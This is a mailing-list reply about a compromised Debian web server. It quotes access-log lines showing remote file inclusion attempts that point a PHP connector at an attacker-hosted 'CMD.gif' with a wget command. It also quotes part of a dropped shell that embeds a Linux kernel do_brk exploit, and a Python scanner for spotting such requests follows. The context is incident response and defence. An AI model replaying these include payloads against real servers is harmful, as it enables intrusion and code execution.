
Re: ***DEB*: Re: help needed



On Mon, Nov 06, 2006 at 06:21:26PM +0100, Fuzzums wrote:
> 213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget HTTP/1.0" 403 495 "http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget"; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
> 213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET http://85.214.18.193/cms/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget HTTP/1.0" 403 499 "http://85.214.18.193/cms/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget"; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
> 
> http://213.202.214.106/CMD.gif isn't a gif.
> 
> [snip]
> 
> if ($kernel == "write") {
>    $kernel = "/*\n" .
>              " * hatorihanzo.c\n" .
>              " * Linux kernel do_brk vma overflow exploit.\n" .
>              " *\n" .
>              " * The bug was found by Paul (IhaQueR) Starzetz <paul@isec.pl>\n" .
>              " *\n" .
>              " * Further research and exploit development by\n" .
>              " * Wojciech Purczynski <cliph@isec.pl> and Paul Starzetz.\n" .
>              " *\n" .
>              " * (c) 2003 Copyright by IhaQueR and cliph. All Rights Reserved.\n" .
>              " *\n" .
>              " * COPYING, PRINTING, DISTRIBUTION, MODIFICATION, COMPILATION AND ANY USE\n" .
>              " * OF PRESENTED CODE IS STRICTLY PROHIBITED.\n" .
> 
> [/snip]
> 
> I think this will give you an idea of what happened.

Keep your kernel up to date; easiest if you use the Debian-provided
Linux images, they have security support.
This hole has long been closed there.

-- 
maks
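
The quoted requests carry a remote URL in the `base_path` query parameter and were answered with 403. As an added example (not part of the original thread), the Python below flags such requests in an access log and separates refused ones from ones the server answered without an error status. The sample lines are constructed with documentation addresses, and the `page` parameter in the second line is hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# client ident user [time] "METHOD target PROTO" status ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3}) ')
# A query parameter whose value is itself a URL is the remote-include pattern.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines (documentation addresses), modelled on the quoted log.
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Nov/2006:17:26:03 +0100] "GET http://198.51.100.5/manager/'
    'media/browser/mcpuk/connectors/php/Commands/Thumbnail.php'
    '?base_path=http://203.0.113.7/CMD.gif?&cmd=wget HTTP/1.0" 403 495 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [03/Nov/2006:17:26:04 +0100] "GET /cms/index.php'
    '?page=http%3A%2F%2F203.0.113.7%2FCMD.gif%3F HTTP/1.0" 200 1204 "-" "Mozilla/4.0"',
    '192.0.2.44 - - [03/Nov/2006:17:30:11 +0100] "GET /index.php?id=12&lang=en '
    'HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

def find_remote_includes(lines):
    """Return one finding per query parameter whose value is a remote URL."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log request line
        client, when, _method, target, status = m.groups()
        try:
            parts = urlsplit(target)
            # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well
            for name, value in parse_qsl(parts.query, keep_blank_values=True):
                if REMOTE_RE.match(value):
                    findings.append({
                        "client": client, "time": when, "path": parts.path,
                        "param": name,
                        "remote_host": urlsplit(value).hostname,
                        "status": int(status),
                        # 4xx/5xx: refused; anything else needs follow-up
                        "refused": int(status) >= 400,
                    })
        except ValueError:
            continue  # malformed URL in attacker-controlled input
    return findings

if __name__ == "__main__":
    for f in find_remote_includes(SAMPLE_LOG):
        tag = "refused" if f["refused"] else "REVIEW"
        print(f'{tag:8} {f["client"]} {f["path"]} {f["param"]} -> {f["remote_host"]}')
```
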


